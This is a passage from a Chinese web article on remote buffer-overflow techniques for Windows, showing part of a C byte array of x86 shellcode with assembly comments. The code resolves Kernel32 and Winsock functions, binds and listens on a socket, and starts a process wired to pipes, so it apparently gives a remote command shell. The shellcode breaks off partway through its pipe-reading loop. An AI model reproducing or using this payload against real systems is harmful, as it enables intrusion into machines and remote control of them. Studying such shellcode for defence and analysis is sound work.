云南龙网

  1. 首页 > 云知道 > >

windows系统下的远程溢出方法( 五 )

云知道


0xb3, 0xe4, /* mov bl, e4 */
0xff, 0x13, /* call dword ptr [ebx] */
0xab, /* stosd */
0x59, /* pop ecx */
0x5a, /* pop edx */
0xe2, 0xec, /* loop loadSocketProcess */
/*
这一段代码就是前期的准备工作,它负责获得所有的函数的入口地址,这些函数是:
"KERNEL32.dll"
"CreatePipe"
"GetStartupInfoA"
"CreateProcessA"
"PeekNamedPipe"
"GlobalAlloc"
"WriteFile"
"ReadFile"
"Sleep"
"ExitProcess"
【windows系统下的远程溢出方法】"WSOCK32.dll"
"socket"
"bind"
"listen"
"accept"
"send"
"recv"
*/
0x83, 0xc6, 0x05, /* add esi, 00000005 */
0x33, 0xc0, /* xor eax, eax */
0x50, /* push eax */
0x40, /* inc eax */
0x50, /* push eax */
0x40, /* inc eax */
0x50, /* push eax */
0xff, 0x57, 0xe8, /* call [edi-18] */
0x93, /* xchg eax,ebx */
0x6a, 0x10, /* push 00000010 */
0x56, /* push esi */
0x53, /* push ebx */
0xff, 0x57, 0xec, /* call [edi-14] */
0x6a, 0x02, /* push 00000002 */
0x53, /* push ebx */
0xff, 0x57, 0xf0, /* call [edi-10] */
0x33, 0xc0, /* xor eax, eax */
0x57, /* push edi */
0x50, /* push eax */
0xb0, 0x0c, /* mov al, 0C */
0xab, /* stosd */
0x58, /* pop eax */
0xab, /* stosd */
0x40, /* inc eax */
0xab, /* stosd */
0x5f, /* pop edi */
0x48, /* dec eax */
0x50, /* push eax */
0x57, /* push edi */
0x56, /* push esi */
0xad, /* lodsd */
0x56, /* push esi */
0xff, 0x57, 0xc0, /* call [edi-40] */
0x48, /* dec eax */
0x50, /* push eax */
0x57, /* push edi */
0xad, /* lodsd */
0x56, /* push esi */
0xad, /* lodsd */
0x56, /* push esi */
0xff, 0x57, 0xc0, /* call [edi-40] */
0x48, /* dec eax */
0xb0, 0x44, /* mov al, 44 */
0x89, 0x07, /* mov dword ptr [edi], eax */
0x57, /* push edi */
0xff, 0x57, 0xc4, /* call [edi-3C] */
0x33, 0xc0, /* xor eax, eax */
0x8b, 0x46, 0xf4, /* mov eax, dword ptr [esi-0C] */
0x89, 0x47, 0x3c, /* mov dword ptr [edi 3C], eax */
0x89, 0x47, 0x40, /* mov dword ptr [edi 40], eax */
0x8b, 0x06, /* mov eax, dword ptr [esi] */
0x89, 0x47, 0x38, /* mov dword ptr [edi 38], eax */
0x33, 0xc0, /* xor eax, eax */
0x66, 0xb8, 0x01, 0x01, /* mov ax, 0101 */
0x89, 0x47, 0x2c, /* mov dword ptr [edi 2C], eax */
0x57, /* push edi */
0x57, /* push edi */
0x33, 0xc0, /* xor eax, eax */
0x50, /* push eax */
0x50, /* push eax */
0x50, /* push eax */
0x40, /* inc eax */
0x50, /* push eax */
0x48, /* dec eax */
0x50, /* push eax */
0x50, /* push eax */
0xad, /* lodsd */
0x56, /* push esi */
0x33, 0xc0, /* xor eax, eax */
0x50, /* push eax */
0xff, 0x57, 0xc8, /* call [edi-38] */
0xff, 0x76, 0xf0, /* push [esi-10] */
0xff, 0x57, 0xcc, /* call [edi-34] */
0xff, 0x76, 0xfc, /* push [esi-04] */
0xff, 0x57, 0xcc, /* call [edi-34] */
0x48, /* dec eax */
0x50, /* push eax */
0x50, /* push eax */
0x53, /* push ebx */
0xff, 0x57, 0xf4, /* call [edi-0C] */
0x8b, 0xd8, /* mov ebx, eax */
0x33, 0xc0, /* xor eax, eax */
0xb4, 0x04, /* mov ah, 04 */
0x50, /* push eax */
0xc1, 0xe8, 0x04, /* shr eax, 04 */
0x50, /* push eax */
0xff, 0x57, 0xd4, /* call [edi-2C] */
0x8b, 0xf0, /* mov esi, eax */
/* PeekPipe: */
0x33, 0xc0, /* xor eax, eax */
0x8b, 0xc8, /* mov ecx, eax */
0xb5, 0x04, /* mov ch, 04 */
0x50, /* push eax */
0x50, /* push eax */
0x57, /* push edi */
0x51, /* push ecx */
0x56, /* push esi */
0xff, 0x77, 0xa8, /* push [edi-58] */

推荐阅读


上一篇:和平精英组队界面怎么打字聊天

下一篇:共享篮球怎么收费?